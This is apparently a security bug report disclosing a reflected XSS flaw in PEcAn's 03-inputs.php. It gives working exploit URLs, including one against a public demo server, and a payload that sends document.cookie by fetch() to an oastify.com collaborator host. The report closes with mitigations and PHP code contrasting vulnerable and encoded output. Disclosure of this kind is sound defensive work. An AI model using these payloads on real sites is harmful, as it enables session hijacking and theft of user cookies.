Bug Description
An unauthenticated user can access 03-inputs.php and execute a reflected XSS on the site with the payload:
"3cck"><script>alert(1)<%2fscript>zqqf2jvbenj" in the URL parameters: hostname, sitegroupid, lat, lon, and sitename.
To Reproduce
I am hosting on a fresh install through Docker. To repeat the steps, go to your pecan.localhost server and paste this path:
http://pecan.localhost/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=99000000003&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ezqqf2jvbenj
I was also able to exploit this on your demo at:
http://pecan.ncsa.illinois.edu/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=5000000259&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ezqqf2jvbenj
Further description
The vulnerability occurs when unsanitized input from the user is reflected back on the page without proper validation or escaping. This allows an attacker to inject malicious JavaScript code into the application, which will be executed in the context of the victim's browser.
Screenshots
XSS Execution at pecan.ncsa.illinois.edu:
XSS Execution on localhost:
Source code of site with injected values:
In addition to executing JavaScript, I can also craft the XSS to steal a user's cookie and their session. If I send a payload like so:
http://pecan.localhost/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=99000000003&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3e%3cscript%3efetch(%27https%3a%2f%2f4v0ed43gg2vq3ckagbmyfdbpigo7cy0n.oastify.com%27%2c%20%7bmethod%3a%20%27POST%27%2cmode%3a%20%27no-cors%27%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3ezqqf2jvbenj
My payload is this in the sitename parameter:
When I poll my collaborator in Burp Suite, I get the user's cookie information returned to me.
Mitigation:
HttpOnly Flag for Cookies: Ensure sensitive cookies (e.g., session IDs) are marked as HttpOnly so they cannot be accessed via JavaScript.
Content Security Policy (CSP): A properly configured CSP can help mitigate the risk of XSS attacks by restricting where scripts can be loaded from.
Input Sanitization & Output Encoding: Always sanitize user input and properly encode output to prevent malicious JavaScript from being executed in the browser.
In addition to the above, you can read more about reflected XSS here: https://portswigger.net/web-security/cross-site-scripting/reflected
Guidance for fixing it is here: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
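As an added illustration (not PEcAn's own code; the function names, the input field markup and the CSP value are assumptions), here is the reflection pattern this report describes next to a hardened form that applies the three mitigations above:

```php
<?php
// Added example, not code from 03-inputs.php: the field and function
// names are assumptions about how a page might reflect its query string.

// VULNERABLE pattern: the sitename parameter is concatenated straight into
// an attribute value. A value containing "> closes the attribute and the
// tag, so whatever follows is parsed by the browser as markup.
function render_unsafe(array $get): string {
    $sitename = $get['sitename'] ?? '';
    return '<input type="text" name="sitename" value="' . $sitename . '">';
}

// HARDENED pattern: encode for the HTML attribute context before
// reflecting. ENT_QUOTES covers both " and ', so the attribute cannot be
// broken out of; < and > are always encoded, so no tag can be injected.
function html_attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_safe(array $get): string {
    $sitename = $get['sitename'] ?? '';
    return '<input type="text" name="sitename" value="' . html_attr($sitename) . '">';
}

// Defence in depth, to be called before any output is sent:
// 1. HttpOnly (plus Secure and SameSite) on the session cookie, so script
//    that does run cannot read it via document.cookie.
// 2. A CSP without 'unsafe-inline', so an injected inline <script> is
//    refused by the browser even if encoding is missed somewhere.
function send_hardening_headers(): void {
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");
}

// Demonstration with the decoded payload from the report.
send_hardening_headers();
$payload = '3cck"><script>alert(1)</script>zqqf2jvbenj';
echo render_unsafe(['sitename' => $payload]), "\n";
echo render_safe(['sitename' => $payload]), "\n";
```

Run from the command line, the first line printed shows the attribute closed and a script tag emitted, while the second shows the whole payload kept inside the quoted value.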